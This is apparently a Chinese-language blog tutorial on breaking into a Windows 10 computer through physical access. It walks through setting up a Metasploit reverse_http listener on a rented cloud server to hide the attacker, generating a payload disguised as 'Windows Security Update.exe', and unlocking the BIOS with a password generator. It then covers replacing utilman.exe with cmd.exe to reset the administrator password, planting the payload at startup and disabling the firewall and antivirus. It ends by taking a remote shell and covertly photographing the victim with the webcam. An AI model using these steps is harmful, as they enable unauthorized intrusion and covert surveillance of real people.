简介
网上看到有人发布的关于win10的入侵流程,正好手上有两台电脑,大致说一下我的思路吧
原理
原理其实都是差不多的,即想办法把你的后门植入系统,然后远程控制。随着win10越来越安全,如果对方防备完善的话,
防火墙全开,远程端口默认禁止,附带杀毒软件,那么很难不通过物理接触感染系统。这里的思路利用win10的secure boot
提权然后拿到Administrator帐号进行入侵
步骤
简要分为以下几个步骤:
1.制作2块USB
2.物理接触主机,获得Admin权限
3.进入系统植入后门
4.入侵完成,拔出USB溜之大吉
5.远程控制,享受入侵的福利
准备
两台电脑,一台Linux,一台win10, Linux是攻击者,win10是靶机
这里不建议直接用入侵电脑控制靶机,因为会暴露目标。推荐Ali或者Amazon,GCP去租一台免费云服务器,如果
是Amazon的话学生每年有100$的免费配额可以使用,用EDU邮箱注册即可
SSH连到云服务器,安装MSF:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
sudo chmod 755 msfinstall
sudo ./msfinstall
安装screen:
sudo apt-get install screen
生成一个脚本文件:
touch automate.rc
sudo nano automate.rc
输入以下内容:
use multi/handler
set payload windows/meterpreter/reverse_http
set LHOST *你的IP*
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j
然后ctrl + x退出,y保存
这里把TCP数据包传输到异常端口(4444,5555)来躲避DPI(deep packet inspection) (注:这里面对win10最新版本是没有用的,实际还需要手动关闭防火墙和网络端口保护)
打开MSF:
sudo msfconsole
然后就看到经典的logo了,输入以下代码生成payload:
msfvenom --encoder cmd/powershell_base64 --payload windows/meterpreter/reverse_http LHOST=*你的IP* LPORT=4444 --arch x86 --platform win --format exe --out ~/'Windows Security Update.exe'
这个payload会以正常安全更新的exe伪装,从而达到规避用户注意的效果
把这个exe文件用ftp拉到本地,然后拷到USB1 上
去MS官网下载windows installation media,然后烧录到USB2 上
攻击
月黑风高之夜,你披着一件纯黑的夜行衣,在利用社会工程学后成功来到了机房。面对满眼的机器,你既没有用户账户也没有密码。你接近一台主机,重启后狂按F12切到BIOS设置页面,发现需要输入密码才能解锁BIOS…
你不慌不忙,很快打开https://bios-pw.org/, 然后输入机器序列号,这就解锁了,于是你把secure boot关掉,保存设置后关机
插上USB2,启动按F12选择USB boot,然后顺理成章的进入了系统安装界面(蓝色屏幕),这时候不要继续:
shift + F10
调出CMD,发现是X:,于是:
cd C:
cd windows\system32
dir
确认有一个文件叫做utilman.exe,这个文件本来是可以在开机登录界面用的,用来调节亮度等信息,普通用户也可以接触
输入:
mv utilman.exe utilman.exe.bak
cp cmd.exe utilman.exe
覆盖掉原文件,原来的utilman文件备份起来
重新正常启动,然后进入win10登录页面,点击右下角的ease of access,奇迹出现了,弹出一个cmd对话框,而且还是管理员权限的
输入:
net user administrator *password*
注意替换password,就重设了默认管理员的密码,登进去
插入USB1,把Windows Security Update.exe放到start menu/program下
关闭防火墙和杀毒软件,关闭网络和端口保护
然后把utilman复原:
打开管理员cmd
mv utilman.exe.bak utilman.exe
关机,拔出USB溜之大吉
入侵后
主机已经成功被你入侵,ssh连到云服务器,然后输入:
sudo screen msfconsole -r ~/automate.rc
进行监听
假设对方完全不知道自己被入侵,于是打开电脑,这时候云服务器输入:
sessions
可以看到有一个对应的Id以及对应的IPV4地址
输入:
sessions -i 1
选择第一个目标
然后就可以拿到shell了
webcam_list
会列出摄像头列表
webcam_snap -i 1 -v false
用第一个摄像头拍照,照片就存储在云服务器上